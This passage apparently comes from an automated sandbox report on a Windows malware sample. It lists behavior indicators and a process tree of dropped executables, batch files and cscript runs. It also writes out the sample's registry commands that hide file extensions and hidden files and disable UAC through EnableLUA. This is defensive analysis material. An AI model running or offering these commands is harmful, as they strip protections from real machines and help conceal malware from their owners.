N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\mSgYkYQw\lWwscwwc.exe
PID 2008 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\mSgYkYQw\lWwscwwc.exe
PID 2008 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\mSgYkYQw\lWwscwwc.exe
PID 2008 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe
PID 2008 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe
PID 2008 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe
PID 2008 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1792 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1792 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2008 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2864 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2864 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2864 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 216 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 216 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 216 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 228 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1236 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1236 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1236 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3024 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1556 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1556 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\System32\Conhost.exe
PID 3024 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\System32\Conhost.exe
PID 3024 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\System32\Conhost.exe
PID 3024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

C:\Users\Admin\mSgYkYQw\lWwscwwc.exe

"C:\Users\Admin\mSgYkYQw\lWwscwwc.exe"

C:\ProgramData\RogQUwEA\IOcYUcsQ.exe

"C:\ProgramData\RogQUwEA\IOcYUcsQ.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmAQsAAI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYkMMcsA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bMggAgME.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QKgcQMMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dqwcQYEA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JgMIcggY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

